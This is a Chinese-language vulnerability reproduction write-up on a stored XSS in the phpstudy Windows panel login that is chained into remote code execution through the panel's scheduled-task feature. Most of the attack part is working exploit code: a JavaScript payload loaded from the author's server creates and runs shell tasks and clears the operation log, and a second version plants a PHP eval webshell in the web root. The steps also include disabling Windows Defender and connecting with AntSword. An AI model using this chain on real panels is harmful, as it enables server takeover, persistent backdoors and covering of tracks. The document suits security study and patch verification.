一、漏洞描述

最近爆出phpstudy 小皮面板存在RCE漏洞，通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。这是一个很简单的1click的RCE，通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。

二、漏洞复现

1.首先在官网下载最新的 小皮windows面板 安装程序

2.在win10虚拟机中进行安装

3.安装完成后会弹出访问地址，具体如下：

4.访问登录系统面板，页面如下：

5.首先在用户名处插入弹窗的xss代码验证是否存在漏洞

<script>alert(123)</script>

6.然后再使用管理员账号登录系统

发现已经触发了弹窗。这是因为整个系统在加载的时候会读取操作日志的内容，因为刚才已经插入了弹窗的xss代码，所以这里执行显示了。

7.该系统后台有个计划任务的功能，其中可以执行系统命令，所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。

具体步骤如下：

a. 在vps上部署需要插入的 poc.js 文件，内容显示如下(在服务器的www目录下写入验证txt文件)

<function poc(){

$.get('/service/app/tasks.php?type=task_list',{},function(data){

var id=data.data[0].ID;

$.post('/service/app/tasks.php?type=exec_task',{

tid:id

},function(res){

$.post('/service/app/tasks.php?type=set_task_status',{

task_id:id,

status:0

},function(res1){

$.post('/service/app/tasks.php?type=set_task_status',{

task_id:id,

status:0

},function(res2){

$.post("/service/app/log.php?type=clearlog",{

type:"clearlog"

},function(res3){},"json");

},"json");

},"json");

},"json");

},"json");

}

function save(){

var data=new Object();

data.task_id="";

data.title="test";

data.exec_cycle="1";

data.week="1";

data.day="3";

data.hour="10";

data.minute = "15";

data.shell="echo ryan >C:/xp/xp.cn/www/1.txt";

$.post('/service/app/tasks.php?type=save_shell',data,function(res){

poc();

},'json');

}

save();

// 这里的hour代表时，minute代表分>

PS：这里需要清空日志，避免重复触发，不然很容易把真实环境搞崩

b. 然后在登陆的用户名处插入如下代码

<script src=http://192.168.81.162/poc.js></script>

c. 只要管理员登录到系统，我们插入的xss代码即可写入计划任务并执行，通过计划任务就可以在服务器上写入文件。

复现到此，程序崩了。

使用 小皮面板命令行 重启服务

d. 因为小皮面板这个运维系统类似于宝塔，所以其中会部署网站

e. 这里写入webshell的话可以向网站目录下写

C:\xp\xp.cn\www\wwwroot\admin\localhost_80\wwwroot

f. 将上面的poc改造如下

function poc(){
$.get('/service/app/tasks.php?type=task_list',{},function(data){
var id=data.data[0].ID;
$.post('/service/app/tasks.php?type=exec_task',{
tid:id
},function(res2){
$.post('/service/app/log.php?type=clearlog',{

},function(res3){},"json");


},"json");
},"json");
}
function save(){
var data=new Object();
data.task_id="";
data.title="test";
data.exec_cycle="1";
data.week="1";
data.day="3";
data.hour="14";
data.minute = "20";
data.shell='echo "<?php @eval($_POST[123]);?>" >C:/xp/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';
$.post('/service/app/tasks.php?type=save_shell',data,function(res){
poc();
},'json');
}
save();

g. 用户名输入一下payload，密码任意，登录两次(登录一次面板有时候会不显示)

<script src=http://192.168.81.162/poc2.js></script>

h. 当管理员进入了首页或者操作日志，即可执行计划任务写入webshell

Windows Defender 直接把webshell给删了

关闭Windows Defender，重新写入计划任务

i. 执行完成之后可以看到写入php文件成功了

j. 连接蚁剑

三、总结

登录框处存在一个xss，管理员登录成功之后会触发xss漏洞，在登录成功之后的后台功能点计划任务当中存在命令执行，但是需要登录成功才可以利用，所以直接去编写恶意JS文件去写入计划任务，再到管理员登录去触发xss，使其管理员登录成功之后触发xss里的恶意JS文件从而导致RCE。

四、参考链接

phpstudy 小皮web面板 RCE漏洞：https://mp.weixin.qq.com/s/bZwd8pcPIINQihIuIUIyFA

小皮web面板 RCE漏洞：https://mp.weixin.qq.com/s/5w4yE3xX-Ep72O6GJy569g